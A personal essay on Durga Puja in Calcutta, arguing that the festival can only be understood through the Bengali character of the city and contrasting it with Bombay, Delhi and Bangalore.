To understand what it means, you have to be here. As the years went on and as I went from Puja to Puja, I tried to work out why nobody could explain to outsiders what it was that made Puja so special. Why was that I failed as completely as everybody else in communicating the essence of Puja? Why did all the time-honoured comparisons not really ring true; with Dushera, Diwali, Christmas, Easter, Thanksgiving and God alone knows what else?

The answer, I suspect - and after all these years, it is still a suspicion, I have no solutions - is that you can't understand Puja unless you understand Calcutta and unless you understand Bengalis.

Most modern Indian cities strive to rise above ethnicity. Tell anybody who lives in Bombay that he lives in a Maharashtrian city and (unless of course, you are speaking to Bal Thackeray) he will take immediate offence. We are cosmopolitan, he will say indigenously. Tell a Delhiwalla that his is a Punjabi city (which, in many ways, it is) and he will respond with much self-righteous nonsense about being the nation's capital, about the international composition of the city's elite etc. And tell a Bangalorean that he lives in a Kannadiga city and you'll get lots of techno-gaff about the internet revolution and about how Bangalore is even more cosmopolitan than Bombay.

But, the only way to understand what Calcutta is about is recognize that the city is essentially Bengali. What's more, no Bengali minds you saying that. Rather, he is proud of the fact. Calcutta's strengths and weaknesses mirror those of the Bengali character. It has the drawbacks: the sudden passions, the cheerful chaos, the utter contempt for mere commerce, the fiery response to the smallest provocation.

And it has the strengths (actually, I think of the drawbacks as strengths in their own way). Calcutta embodies the Bengali love of culture; the triumph of intellectualism over greed; the complete transparency of all emotions, the disdain with which hypocrisy and insincerity are treated; the warmth of genuine humanity; and the supremacy of emotion over all other aspects of human existence.

That's why Calcutta is not for everyone. You want your cities clean and green; stick to Delhi. You want your cities, rich and impersonal; go to Bombay. You want them high-tech and full of draught beer; Bangalore's your place.

But if you want a city with a soul: come to Calcutta.

When I look back on the years I've spent in Calcutta - and I come back so many times each year that I often feel I've never been away - I don't remember the things that people remember about cities. When I think of London, I think of the vast open spaces of Hyde Park. When I think of New York, I think of the frenzy of Times Square. When I think of Tokyo, I think of the bright lights of Shinjiku. And when I think of Paris, I think of the Champs Elysee.

But when I think of Calcutta, I never think of any one place. I don't focus on the greenery of the maidan, the beauty of the Victoria Memorial, the bustle of Burra Bazar or the splendour of the new Howrah "Bridge".

I think of people. Because, finally, a city is more than bricks and mortars, street lights and tarred roads. A city is the sum of its people.

And who can ever forget - or replicate - the people of Calcutta?

When I first came to live here, I was told that the city would grow on me. What nobody told me was that the city would change my life. It was in Calcutta that I learnt about true warmth; about simple human decency; about love and friendship; about emotions and caring; about truth and honesty.

I learnt other things too. Coming from Bombay as I did, it was revelation to live in a city where people judged each other on the things that really mattered; where they recognized that being rich did not make you a better person - in fact, it might have the opposite effect. I learnt also that if life is about more than just money, it is about the things that other cities ignore; about culture, about ideas, about art, and about passion.

In Bombay, a man with a relatively low income will salt some of it away for the day when he gets a stock market tip. In Calcutta, a man with exactly the same income will not know the difference between a debenture and a dividend. But he will spend his money on the things that matter. Each morning, he will read at least two newspapers and develop sharply etched views on the state of the world. Each evening, there will be fresh (ideally, fresh-water or river) fish on his table. His children will be encouraged to learn to dance or sing. His family will appreciate the power of poetry. And for him, religion and culture will be in inextricably bound together.

Ah religion!

Tell outsiders about the importance of Puja in Calcutta and they'll scoff. Don't be silly, they'll say. Puja is a religious festival. And Bengal has voted for the CPM since 1977. How can godless Bengal be so hung up on a religions festival? I never know how to explain them that to a Bengali, religion consists of much more than shouting Jai Shri Ram or pulling down somebody's mosque. It has little to do with meaningless ritual or sinister political activity.

The essence of Puja is that all the passions of Bengal converge: emotion, culture, the love of life, the warmth of being together, the joy of celebration, the pride in artistic _expression and yes, the cult of the goddess. It may be about religion. But is not about much more than just worship. In which other part of India would small, not particularly well-off localities, vie with each other to produce the best pandals? Where else could puja pandals go beyond religion to draw inspiration from everything else? In the years I lived in Calcutta, the pandals featured Amitabh Bachchan, Princes Diana and even Saddam Hussain! Where else would children cry with the sheer emotional power of Dashimi, upset that the Goddess had left their homes? Where else would the whole city gooseflesh when the dhakis first begin to beat their drums? Which other Indian festival - in any part of the country - is so much about food, about going from one roadside stall to another, following your nose as it trails the smells of cooking?

To understand Puja, you must understand Calcutta. And to understand Calcutta, you must understand the Bengali. It's not easy. Certainly, you can't do it till you come and live here, till you let Calcutta suffuse your being, invade your bloodstream and steal your soul. But once you have, you'll love Calcutta forever. Wherever you go, a bit of Calcutta will go with you.

I know, because it's happened to me. And every Puja, I am overcome by the magic of Bengal. It's a feeling that'll never go away.